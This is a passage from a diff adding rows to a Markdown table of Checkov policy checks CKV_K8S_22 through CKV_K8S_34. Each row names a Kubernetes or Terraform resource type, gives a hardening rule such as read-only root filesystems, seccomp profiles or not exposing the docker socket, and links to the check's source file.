[ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 2910 | CKV_K8S_22 | resource | kubernetes_deployment_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 2911 | CKV_K8S_22 | resource | kubernetes_pod | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 2912 | CKV_K8S_22 | resource | kubernetes_pod_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 2913 | CKV_K8S_23 | resource | CronJob | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | +| 2914 | CKV_K8S_23 | resource | DaemonSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | +| 2915 | CKV_K8S_23 | resource | Deployment | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | +| 2916 | CKV_K8S_23 | resource | Job | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | +| 2917 | CKV_K8S_23 | resource | Pod | Minimize the admission of root containers | 
Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) |
+| 2918 | CKV_K8S_23 | resource | ReplicaSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) |
+| 2919 | CKV_K8S_23 | resource | ReplicationController | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) |
+| 2920 | CKV_K8S_23 | resource | StatefulSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) |
+| 2921 | CKV_K8S_24 | resource | PodSecurityPolicy | Do not allow containers with added capability | Kubernetes | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesPSP.py) |
+| 2922 | CKV_K8S_24 | resource | kubernetes_pod_security_policy | Do not allow containers with added capability | Terraform | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py) |
+| 2923 | CKV_K8S_25 | resource | CronJob | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2924 | CKV_K8S_25 | resource | DaemonSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2925 | CKV_K8S_25 | resource | Deployment | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2926 | CKV_K8S_25 | resource | DeploymentConfig | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2927 | CKV_K8S_25 | resource | Job | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2928 | CKV_K8S_25 | resource | Pod | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2929 | CKV_K8S_25 | resource | PodTemplate | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2930 | CKV_K8S_25 | resource | ReplicaSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2931 | CKV_K8S_25 | resource | ReplicationController | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2932 | CKV_K8S_25 | resource | StatefulSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) |
+| 2933 | CKV_K8S_25 | resource | kubernetes_deployment | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
+| 2934 | CKV_K8S_25 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
+| 2935 | CKV_K8S_25 | resource | kubernetes_pod | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
+| 2936 | CKV_K8S_25 | resource | kubernetes_pod_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
+| 2937 | CKV_K8S_26 | resource | CronJob | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2938 | CKV_K8S_26 | resource | DaemonSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2939 | CKV_K8S_26 | resource | Deployment | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2940 | CKV_K8S_26 | resource | DeploymentConfig | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2941 | CKV_K8S_26 | resource | Job | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2942 | CKV_K8S_26 | resource | Pod | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2943 | CKV_K8S_26 | resource | PodTemplate | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2944 | CKV_K8S_26 | resource | ReplicaSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2945 | CKV_K8S_26 | resource | ReplicationController | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2946 | CKV_K8S_26 | resource | StatefulSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) |
+| 2947 | CKV_K8S_26 | resource | kubernetes_deployment | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
+| 2948 | CKV_K8S_26 | resource | kubernetes_deployment_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
+| 2949 | CKV_K8S_26 | resource | kubernetes_pod | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
+| 2950 | CKV_K8S_26 | resource | kubernetes_pod_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
+| 2951 | CKV_K8S_27 | resource | CronJob | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2952 | CKV_K8S_27 | resource | DaemonSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2953 | CKV_K8S_27 | resource | Deployment | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2954 | CKV_K8S_27 | resource | Job | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2955 | CKV_K8S_27 | resource | Pod | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2956 | CKV_K8S_27 | resource | ReplicaSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2957 | CKV_K8S_27 | resource | ReplicationController | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2958 | CKV_K8S_27 | resource | StatefulSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) |
+| 2959 | CKV_K8S_27 | resource | kubernetes_daemon_set_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 2960 | CKV_K8S_27 | resource | kubernetes_daemonset | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 2961 | CKV_K8S_27 | resource | kubernetes_deployment | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 2962 | CKV_K8S_27 | resource | kubernetes_deployment_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 2963 | CKV_K8S_27 | resource | kubernetes_pod | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 2964 | CKV_K8S_27 | resource | kubernetes_pod_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 2965 | CKV_K8S_28 | resource | CronJob | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2966 | CKV_K8S_28 | resource | DaemonSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2967 | CKV_K8S_28 | resource | Deployment | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2968 | CKV_K8S_28 | resource | DeploymentConfig | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2969 | CKV_K8S_28 | resource | Job | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2970 | CKV_K8S_28 | resource | Pod | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2971 | CKV_K8S_28 | resource | PodTemplate | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2972 | CKV_K8S_28 | resource | ReplicaSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2973 | CKV_K8S_28 | resource | ReplicationController | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2974 | CKV_K8S_28 | resource | StatefulSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
+| 2975 | CKV_K8S_28 | resource | kubernetes_deployment | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
+| 2976 | CKV_K8S_28 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
+| 2977 | CKV_K8S_28 | resource | kubernetes_pod | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
+| 2978 | CKV_K8S_28 | resource | kubernetes_pod_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
+| 2979 | CKV_K8S_29 | resource | CronJob | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2980 | CKV_K8S_29 | resource | DaemonSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2981 | CKV_K8S_29 | resource | Deployment | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2982 | CKV_K8S_29 | resource | Job | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2983 | CKV_K8S_29 | resource | Pod | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2984 | CKV_K8S_29 | resource | ReplicaSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2985 | CKV_K8S_29 | resource | ReplicationController | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2986 | CKV_K8S_29 | resource | StatefulSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
+| 2987 | CKV_K8S_29 | resource | kubernetes_daemon_set_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 2988 | CKV_K8S_29 | resource | kubernetes_daemonset | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 2989 | CKV_K8S_29 | resource | kubernetes_deployment | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 2990 | CKV_K8S_29 | resource | kubernetes_deployment_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 2991 | CKV_K8S_29 | resource | kubernetes_pod | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 2992 | CKV_K8S_29 | resource | kubernetes_pod_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 2993 | CKV_K8S_30 | resource | CronJob | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2994 | CKV_K8S_30 | resource | DaemonSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2995 | CKV_K8S_30 | resource | Deployment | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2996 | CKV_K8S_30 | resource | DeploymentConfig | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2997 | CKV_K8S_30 | resource | Job | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2998 | CKV_K8S_30 | resource | Pod | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 2999 | CKV_K8S_30 | resource | PodTemplate | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 3000 | CKV_K8S_30 | resource | ReplicaSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 3001 | CKV_K8S_30 | resource | ReplicationController | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 3002 | CKV_K8S_30 | resource | StatefulSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
+| 3003 | CKV_K8S_30 | resource | kubernetes_deployment | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
+| 3004 | CKV_K8S_30 | resource | kubernetes_deployment_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
+| 3005 | CKV_K8S_30 | resource | kubernetes_pod | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
+| 3006 | CKV_K8S_30 | resource | kubernetes_pod_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
+| 3007 | CKV_K8S_31 | resource | CronJob | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 3008 | CKV_K8S_31 | resource | DaemonSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 3009 | CKV_K8S_31 | resource | Deployment | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 3010 | CKV_K8S_31 | resource | Job | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 3011 | CKV_K8S_31 | resource | Pod | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 3012 | CKV_K8S_31 | resource | ReplicaSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 3013 | CKV_K8S_31 | resource | ReplicationController | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 3014 | CKV_K8S_31 | resource | StatefulSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
+| 3015 | CKV_K8S_32 | resource | PodSecurityPolicy | Ensure default seccomp profile set to docker/default or runtime/default | Kubernetes | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SeccompPSP.py) |
+| 3016 | CKV_K8S_32 | resource | kubernetes_pod_security_policy | Ensure default seccomp profile set to docker/default or runtime/default | Terraform | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py) |
+| 3017 | CKV_K8S_33 | resource | CronJob | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 3018 | CKV_K8S_33 | resource | DaemonSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 3019 | CKV_K8S_33 | resource | Deployment | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 3020 | CKV_K8S_33 | resource | DeploymentConfig | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 3021 | CKV_K8S_33 | resource | Job | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 3022 | CKV_K8S_33 | resource | Pod | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 3023 | CKV_K8S_33 | resource | PodTemplate | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 3024 | CKV_K8S_33 | resource | ReplicaSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 3025 | CKV_K8S_33 | resource | ReplicationController | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 3026 | CKV_K8S_33 | resource | StatefulSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
+| 3027 | CKV_K8S_34 | resource | CronJob | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
+| 3028 | CKV_K8S_34 | resource | DaemonSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
+| 3029 | CKV_K8S_34 | resource | Deployment | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
+| 3030 | CKV_K8S_34 | resource | DeploymentConfig | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
+| 3031 | CKV_K8S_34 | resource | Job | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
+| 3032 | CKV_K8S_34 | resource | Pod | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
+| 3033 | CKV_K8S_34 | resource | PodTemplate | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) |
